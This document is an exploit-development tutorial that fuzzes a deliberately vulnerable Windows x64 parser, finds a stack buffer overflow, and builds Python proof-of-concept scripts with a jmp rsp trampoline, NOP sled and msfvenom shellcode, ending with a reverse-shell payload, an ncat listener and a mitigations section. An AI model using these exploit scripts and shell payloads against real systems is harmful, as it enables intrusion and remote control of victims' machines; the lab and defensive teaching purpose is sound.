
Hunting 0-days: Exploiting a Custom Binary Parser on Windows x64

0. Introduction

Before a CVE gets a number and a patch, someone has to find the bug. This is what that process actually looks like, from a fuzzer detecting an anomaly to a reverse shell landing on the attacker’s machine. The classic approaches for finding vulnerabilities are:

Type | Explanation
Static analysis | Disassembling the software and studying its code without running it
Dynamic analysis | Running and debugging the software to observe how it reacts
Taint analysis | Tracking how untrusted input flows through the program and what it influences

Most security researchers rely on existing fuzzers. I wanted to understand what happens underneath, so I built one. I integrated a custom structure-aware seed generator that knows where, how and how intensely to mutate the data in order to trigger certain vulnerabilities.

1. Preparation

The environment we are working in is Windows x64.

The file we will be testing is a realistic binary parser. It contains 4 vulnerable functions, and to test how well my fuzzer performs, I added 4 layers of security that filter the input before it is parsed. I then compiled it without stack protection (stack canaries) for demonstration purposes.

The fuzzer I used is not publicly available yet, since it’s still under development, but you can easily use an existing one such as AFL++ or, on Windows, WinAFL.

The debugger I used is x64dbg, and I developed the exploit and POC (proof of concept) in Python.

2. Fuzzing

To build its corpus, my fuzzer needs a starting seed: an input that our target parses normally, without crashing. If you don’t have one, you can often find sample files for the format you need by searching GitHub for its extension. In my case, the starting seed is a .bin file.
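To make “a valid input” concrete, here is a minimal sketch of a seed builder. It assumes the header layout used by the POC scripts later in this article (magic bytes, 32-bit version, 8-byte opcode, 32-bit declared length, then the data); `build_seed` is a hypothetical helper, not part of my fuzzer.

```python
import struct

MAGIC = b'\x01\x02\x03\x04'  # assumed magic bytes, as in the POC scripts


def build_seed(data: bytes, opcode: bytes = b'NormalTx', version: int = 1) -> bytes:
    """Build a well-formed input whose declared length matches the real data length."""
    if len(opcode) != 8:
        raise ValueError("opcode must be exactly 8 bytes")
    # magic | version (u32 LE) | opcode (8 bytes) | declared length (u32 LE)
    header = MAGIC + struct.pack('<I', version) + opcode + struct.pack('<I', len(data))
    return header + data
```

Writing `build_seed(b"hello parser")` to a file gives a 32-byte seed whose length field honestly says 12.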

Pointing the fuzzer at the target with the seed loaded, I get this:

Almost instantly, it found a crashing input that got through all four security layers, and it stopped the process so we can continue our research.

As we can see, the fuzzer reports that the mutation that caused the crash is of type Boundary. My tool’s function that creates this kind of mutation looks like this:

This function “lies” about the size of the data we feed to the target (Length Corruption), which is what caused the crash. With that in mind, we can assume that the crash was caused by a Buffer Overflow: the parser trusts the declared length and copies more data than its buffer can hold.
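My fuzzer isn’t public, so the following is not its code. As an illustration only, here is a minimal sketch of a length-corruption (“boundary”) mutation, assuming the header layout of the POC scripts later in this article (a 32-bit little-endian length field at offset 16). The function name and the list of boundary values are hypothetical choices.

```python
import random
import struct

# Assumed layout (from the POC scripts): magic(4) | version(4) | opcode(8) | length(4) | data
LENGTH_OFFSET = 16
HEADER_SIZE = 20

# Values sitting on common integer-size boundaries (hypothetical selection)
BOUNDARY_VALUES = [0, 1, 0x7F, 0x80, 0xFF, 0x100, 0x7FFF, 0x8000, 0xFFFF,
                   0x10000, 0x7FFFFFFF, 0x80000000, 0xFFFFFFFE, 0xFFFFFFFF]


def boundary_mutate(seed: bytes, rng: random.Random) -> bytes:
    """Return a copy of seed whose declared length "lies" about the real data size."""
    if len(seed) < HEADER_SIZE:
        raise ValueError("seed is shorter than the assumed header")
    actual = len(seed) - HEADER_SIZE
    # Boundary constants plus values just past the real data size, never the true size
    candidates = [v for v in BOUNDARY_VALUES + [actual + 1, actual * 2, actual + 0x100]
                  if v != actual]
    mutated = bytearray(seed)
    struct.pack_into('<I', mutated, LENGTH_OFFSET, rng.choice(candidates) & 0xFFFFFFFF)
    return bytes(mutated)
```

Only the 4-byte length field changes. Keeping everything else intact is the structure-aware part: the input still looks well-formed to any check that doesn’t compare the length field with the data actually present.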

3. Debugging

Let’s fire up our debugger and find out what actually happened. After loading the target and passing it crash_DETECTED.bin, we can see that execution stopped here:

Look at the memory dump! The stack has been overwritten with our input, which results in an EXCEPTION_ACCESS_VIOLATION error:

4. Gathering information

To confirm the vulnerability and measure the buffer, we need to flood it with something called a Cyclic Pattern. Unlike a big string of “A”s, it is a specially crafted sequence in which every short run of bytes appears only once, so whatever bytes end up on the stack or in a register tell us exactly how far into our input they were. That lets us measure how much data we need before we overwrite the saved return address, the value the function’s ret instruction loads into the Instruction Pointer (RIP). RIP decides which instruction the processor executes next, so by overflowing the stack precisely, we can make it point to our malware and take control.
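The pattern in the script below is hard-coded, but it follows a simple rule, the same one Metasploit’s pattern_create uses: uppercase letter, lowercase letter, digit, counting upward. Here is a minimal generator sketch; `pattern_create` is a hypothetical name borrowed from that tool.

```python
import itertools
import string


def pattern_create(length: int) -> bytes:
    """Build a Metasploit-style cyclic pattern: Aa0Aa1...Aa9Ab0...Zz9."""
    out = bytearray()
    # product() varies the last iterable fastest: digit, then lowercase, then uppercase
    for upper, lower, digit in itertools.product(string.ascii_uppercase,
                                                 string.ascii_lowercase,
                                                 string.digits):
        if len(out) >= length:
            break
        out += (upper + lower + digit).encode()
    if len(out) < length:
        raise ValueError("maximum pattern length is 20280 bytes")
    return bytes(out[:length])


pattern = pattern_create(240)  # the same 240 bytes as the hard-coded pattern below
```

Because every 3-byte triple is unique, any 8-byte window of the pattern identifies its own position, which is what makes it usable as a ruler.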

To inject our Cyclic Pattern, I used the following code, which writes it into another .bin file:

import struct

payload = bytearray()
payload += b'\x01\x02\x03\x04'       # Magic bytes (file format)
payload += struct.pack('<I', 1)      # Version number, converted into Little-Endian
payload += b'NormalTx'               # OpCode for routing the execution
payload += struct.pack('<I', 0x150)  # Declared data length (0x150 = 336 bytes)

pattern = (
    b"Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9"
    b"Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9"
    b"Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9"
    b"Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9"
)

payload += pattern[:200]  # First 200 bytes of the pattern as the data

with open("crash_test.bin", "wb") as f:
    f.write(payload)

Pass this file to our target from the command line and inspect the registers and the stack:

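The RSP displays our pattern, and it begins with 'a5Aa6Aa7Aa8...'. Because these pattern bytes do not form a valid (canonical) x64 address, the ret instruction faults before it completes, so RSP still points at the overwritten return address. 'a5Aa6Aa7' starts at offset 16 of the pattern, which gives us the layout of the overflow:

Section | Size | Pattern bytes
Padding (junk) | 16 bytes | Aa0Aa1Aa2Aa3Aa4A
Saved return address (loaded into RIP by ret) | 8 bytes | a5Aa6Aa7
Stack after the return address (where RSP points once ret succeeds) | the rest | Aa8Aa9Ab0...

As you can see, the pattern acts as a ruler: it measures how many bytes we need to fill the buffer (padding) before we reach the saved return address that ret loads into RIP. Whatever we place there decides where the processor goes next (the instruction), and the bytes that follow it, which RSP points to after ret, are where our malware will live.

To do this we also need the following:

4.1 Creating the padding and reaching the RIP

As measured above, the padding is 16 bytes: exactly the number of pattern bytes that come before the value RSP pointed to at the crash. Right after it sits the return address, which occupies a full 8-byte stack slot on x64, so we will overwrite it with a complete 8-byte value. Keep these numbers in mind.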
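x64dbg’s stack view shows 64-bit values, so the bytes 'a5Aa6Aa7' appear there as the little-endian qword 0x3761413661413561 (computed from the pattern, not copied from a screenshot). Measuring by hand is error-prone; this small sketch, a hypothetical helper similar in spirit to Metasploit’s pattern_offset, converts such a value back into bytes and looks it up in the pattern.

```python
import struct

# First row of the Cyclic Pattern from the crash_test.bin script (60 bytes)
PATTERN = b"Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9"


def offset_from_qword(qword: int, pattern: bytes = PATTERN) -> int:
    """Turn the 64-bit value shown at [RSP] back into bytes and find it in the pattern."""
    needle = struct.pack('<Q', qword)  # x64 is little-endian: lowest byte first in memory
    offset = pattern.find(needle)
    if offset < 0:
        raise ValueError("value does not come from the pattern")
    return offset


print(offset_from_qword(0x3761413661413561))  # bytes 'a5Aa6Aa7', prints 16
```

The result, 16, is the amount of padding the POC scripts use.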

4.2 Writing the instruction

When the function returns, ret pops our overwritten return address into RIP. Here we will leave the address of an instruction that acts like a trampoline right to our malware: a jmp rsp. After ret, RSP points at the bytes that follow the return address, so jmp rsp tells the processor to jump to the address in RSP, which is exactly where the malware is located.

We could look for one in the target’s own memory, BUT we know that ASLR randomizes addresses, so we will use an address from one of the Windows system DLLs (kernel32.dll or ntdll.dll):

In a real scenario with ASLR fully enabled, this address would change on every reboot. Defeating it requires either an information leak or a non-ASLR module, which we’ll cover later.

In x64dbg, we navigate to the Symbols tab and look for kernel32.dll or ntdll.dll. Double-click it, and in the CPU tab hit Ctrl+Shift+B to search for our instruction pattern. Here we enter FF E4, the machine-code (hex) encoding of jmp rsp:

The References tab lists every matching address. Every x64 user-mode address has 00 00 as its two most significant bytes, so we choose one whose remaining six bytes contain no null octets (00):

Note down this address. We will need it later.
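x64dbg does this search for us, but the two criteria are easy to state in code. This sketch works on a raw byte dump (for example, bytes saved from a module’s code section); the function names are hypothetical, and turning a hit into a real address assumes you know the base address the dump was mapped at.

```python
JMP_RSP = b"\xff\xe4"  # machine-code encoding of `jmp rsp`


def find_jmp_rsp(code: bytes, base: int) -> list[int]:
    """Return base + offset for every FF E4 sequence in a dump that was mapped at base."""
    hits = []
    pos = code.find(JMP_RSP)
    while pos != -1:
        hits.append(base + pos)
        pos = code.find(JMP_RSP, pos + 1)
    return hits


def low_bytes_null_free(address: int) -> bool:
    """True if the six low-order bytes of an x64 user-mode address contain no 0x00.

    The two most significant bytes of such an address are always 00 00,
    so only the lower six bytes are worth checking.
    """
    return 0 not in address.to_bytes(8, "little")[:6]


# Toy dump mapped at a made-up base; its only FF E4 lands at 0x00007FF8709039D3
candidates = [a for a in find_jmp_rsp(b"\x90\xff\xe4\xc3", 0x00007FF8709039D2)
              if low_bytes_null_free(a)]
```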

4.3 Placing the shellcode

The processor finally arrives at the address in RSP. Here is where the magic happens. We will store our shellcode here, and before it we will write a field of NOPs (No Operation instructions, 0x90). The processor slides down through these NOPs like a rollercoaster and lands right in our trap. The field doesn’t need a specific size, so just to be sure it has some fun before executing the shellcode, we will use 24 octets.
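With the padding at 16 bytes, the layout the exploit builds can be written down as offsets. This sketch (a hypothetical helper; 0xCC, the int3 breakpoint opcode, stands in for real shellcode) shows why jmp rsp lands on the sled: after ret pops the 8-byte address, RSP points at offset 24, the first NOP.

```python
import struct

PADDING = 16  # bytes up to the saved return address
SLED = 24     # NOP sled length used in the POC scripts


def build_layout(ret_addr: int, shellcode: bytes) -> tuple[bytes, dict[str, int]]:
    """Assemble padding | return address | NOP sled | shellcode and report key offsets."""
    data = b"A" * PADDING + struct.pack('<Q', ret_addr) + b"\x90" * SLED + shellcode
    offsets = {
        "return_address": PADDING,
        # ret pops 8 bytes, so afterwards RSP points just past the return address
        "rsp_after_ret": PADDING + 8,
        "shellcode": PADDING + 8 + SLED,
    }
    return data, offsets


data, offsets = build_layout(0x00007FF8709039D3, b"\xcc")
```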

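I generated my shellcode using msfvenom. To prove the exploit works, this shellcode only pops up the calculator app. The -b option lists the bad characters msfvenom must keep out of the encoded output, here just the null byte:

msfvenom -p windows/x64/exec CMD=calc.exe -f python -b '\x00'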

5. Proof of concept

Let’s recap before we continue:

Altogether, our Proof of Concept script looks like this:

import struct

payload = bytearray()
payload += b'\x01\x02\x03\x04'       # Magic bytes (file format)
payload += struct.pack('<I', 1)      # Version number, converted into Little-Endian
payload += b'NormalTx'               # OpCode for routing the execution
payload += struct.pack('<I', 0x150)  # Declared data length (0x150 = 336 bytes)

data_payload = bytearray()
data_payload += b"A" * 16  # Padding: 16 octets up to the saved return address

jmp_rsp_address = 0x00007FF8709039D3  # Replace with your own jmp_rsp address

data_payload += struct.pack('<Q', jmp_rsp_address)  # Overwrites the return address (8 bytes, little-endian)

shellcode = (  # Shellcode that launches calc.exe; paste your own msfvenom output here
    b"\x53\x56\x57\x55\x54\x58\x66\x83\xE4\xF0\x50\x6A\x60\x5A\x68\x63\x61\x6C\x63"
    b"\x54\x59\x48\x29\xD4\x65\x48\x8B\x32\x48\x8B\x76\x18\x48\x8B\x76\x10\x48\xAD"
    b"\x48\x8B\x30\x48\x8B\x7E\x30\x03\x57\x3C\x8B\x5C\x17\x28\x8B\x74\x1F\x20\x48"
    b"\x01\xFE\x8B\x54\x1F\x24\x0F\xB7\x2C\x17\x8D\x52\x02\xAD\x81\x3C\x07\x57\x69"
    b"\x6E\x45\x75\xEF\x8B\x74\x1F\x1C\x48\x01\xFE\x8B\x34\xAE\x48\x01\xF7\x99\xFF"
    b"\xD7\x48\x83\xC4\x68\x5C\x5D\x5F\x5E\x5B\xC3"
)
data_payload += b"\x90" * 24  # NOP sled: jmp rsp lands here
data_payload += shellcode
assert len(data_payload) <= 0x150, "payload is larger than the declared length"

# Pad with NOPs up to the declared length
final_payload = payload + data_payload.ljust(0x150, b'\x90')

with open("exploit_calc.bin", "wb") as f:
    f.write(final_payload)

After loading exploit_calc.bin in the target’s debugging session, set the memory permissions of the stack region to ERW-- (Execute, Read, Write) and run it until the calculator pops up:

Setting the memory permissions to ERW-- effectively switches off DEP (Data Execution Prevention) for that region, a shortcut taken for the sake of the POC. In a future article I will explain how the exploit can set these permissions itself using a ROP (Return-Oriented Programming) chain.

And there it is! The processor executed our “malware” and opened up the calculator.

6. Exploitation (popping a shell)

To get a reverse shell instead, we change the previous msfvenom command to this:

msfvenom -p windows/x64/shell_reverse_tcp LHOST=127.0.0.1 LPORT=4444 -b '\x00\x0a\x0d\x20\x09\x0b' -f python
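The longer -b list keeps the null byte, line feed, carriage return, space, tab and vertical tab out of the encoded shellcode; these are bytes that string- or text-oriented input handling commonly treats as terminators or separators. Since it is easy to paste a stale buf, a quick check like this hypothetical helper can confirm that the shellcode really avoids them:

```python
BAD_CHARS = b"\x00\x0a\x0d\x20\x09\x0b"  # same list as the -b option above


def find_bad_chars(data: bytes, bad: bytes = BAD_CHARS) -> list[tuple[int, int]]:
    """Return (offset, value) for every byte of data that appears in bad."""
    return [(i, value) for i, value in enumerate(data) if value in bad]


# The first line of the reverse-shell buf in the script below contains none of them
assert find_bad_chars(b"\x48\x31\xc9\x48\x81\xe9\xc6\xff\xff\xff\x48\x8d") == []
```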

Now that we have a new shellcode, we need to adjust the size of our payload: the reverse-shell shellcode is several hundred bytes long, far larger than the calc one, so it no longer fits in the 0x150 bytes declared before:

import struct

TOTAL_SIZE = 0x300  # Larger declared size so the bigger reverse-shell shellcode fits
PADDING_SIZE = 16   # Bytes up to the saved return address

header = bytearray()
header += b'\x01\x02\x03\x04'            # Magic bytes (file format)
header += struct.pack('<I', 1)           # Version number (Little-Endian)
header += b'NormalTx'                    # OpCode for routing the execution
header += struct.pack('<I', TOTAL_SIZE)  # Declared data length

data_payload = bytearray()
data_payload += b"A" * PADDING_SIZE

jmp_rsp_address = 0x00007FF8709039D3  # Replace with your jmp_rsp address

data_payload += struct.pack('<Q', jmp_rsp_address)  # Overwrites the saved return address
data_payload += b"\x90" * 24                        # NOP sled

buf = b""
buf += b"\x48\x31\xc9\x48\x81\xe9\xc6\xff\xff\xff\x48\x8d"
buf += b"\x05\xef\xff\xff\xff\x48\xbb\x63\xfe\x15\xf7\x62"
#...  write the shellcode msfvenom generated for you
buf += b"\x2e\x64\xa4\xea\x24\xea\x22\x62\x2e\x3d\xe5"

data_payload += buf
assert len(data_payload) <= TOTAL_SIZE, "shellcode does not fit in TOTAL_SIZE"

# Pad with NOPs up to the declared length
final_content = header + data_payload.ljust(TOTAL_SIZE, b'\x90')

with open("exploit_shell.bin", "wb") as f:
    f.write(final_content)

We set up a listener in another PowerShell terminal:

PS D:/> ncat -lvnp 4444

Now let’s feed exploit_shell.bin to our target and see what happens:

And there it is! A reverse shell right into the attacker’s machine, initiated when the processor executed our msfvenom-generated shellcode.

7. Conclusion & Mitigation

The Role of the Crash: From Denial of Service to Control

Many people see a program crash as just a “bug” that closes the software; when an attacker can trigger it on purpose, it is technically a Denial of Service (DoS). However, for an exploit developer, a crash is a strong starting point. Here is why the crash file was our best friend:

In the Information Gathering stage, an attacker can scan the target machine for the software it runs, including its version. They can then replicate everything inside their lab and develop an exploit without ever touching the production server or alerting the victim’s security systems. This is called Off-target Debugging.

Even Google runs 25,000 virtual machines and about 100,000 cores fuzzing Chrome to find such bugs before the attackers do. Since Chrome’s launch, this effort has uncovered over 30,000 previously unknown bugs.

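How to prevent this? Each protection this lab disabled or sidestepped breaks one step of the chain:

Stack canaries (stack protector): detect that the stack was overwritten before the function returns.
DEP (Data Execution Prevention): keeps the stack non-executable, so injected shellcode can’t run.
ASLR: randomizes module addresses, so a hard-coded jmp rsp address stops working.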

That said, none of these are silver bullets. A determined attacker with enough resources can bypass DEP using a ROP chain, a technique that repurposes existing executable code instead of injecting new shellcode. ASLR can be defeated through information leaks, and stack canaries don’t protect against overwrites that skip the canary entirely. This is why defense in depth matters: the goal is to make exploitation so expensive that it isn’t worth it.
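Mitigations are safety nets; the bug itself is that the parser trusted the length field. The fix belongs in the parser: a bounds check before the copy. Here is that check modeled in Python as a minimal sketch, assuming the header layout from the POC scripts; `parse_safely` is a hypothetical name, and BUFFER_SIZE is a hypothetical value, since the real buffer size isn’t shown.

```python
import struct

HEADER = struct.Struct('<4sI8sI')  # magic, version, opcode, declared length: 20 bytes
MAGIC = b'\x01\x02\x03\x04'
BUFFER_SIZE = 16  # hypothetical size of the parser's destination buffer


def parse_safely(blob: bytes) -> bytes:
    """Validate the header and return the data, rejecting lengths that can't fit."""
    if len(blob) < HEADER.size:
        raise ValueError("truncated header")
    magic, _version, _opcode, declared = HEADER.unpack_from(blob, 0)
    if magic != MAGIC:
        raise ValueError("bad magic bytes")
    available = len(blob) - HEADER.size
    # Never trust the declared length: it must fit the buffer AND the data actually present
    if declared > BUFFER_SIZE or declared > available:
        raise ValueError(f"declared length {declared:#x} rejected")
    return blob[HEADER.size:HEADER.size + declared]
```

With this check in place, the crash file’s 0x150 length is rejected before any copy happens.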

In the next article, we’ll look at exactly how a ROP chain bypasses DEP and what it takes to stop one.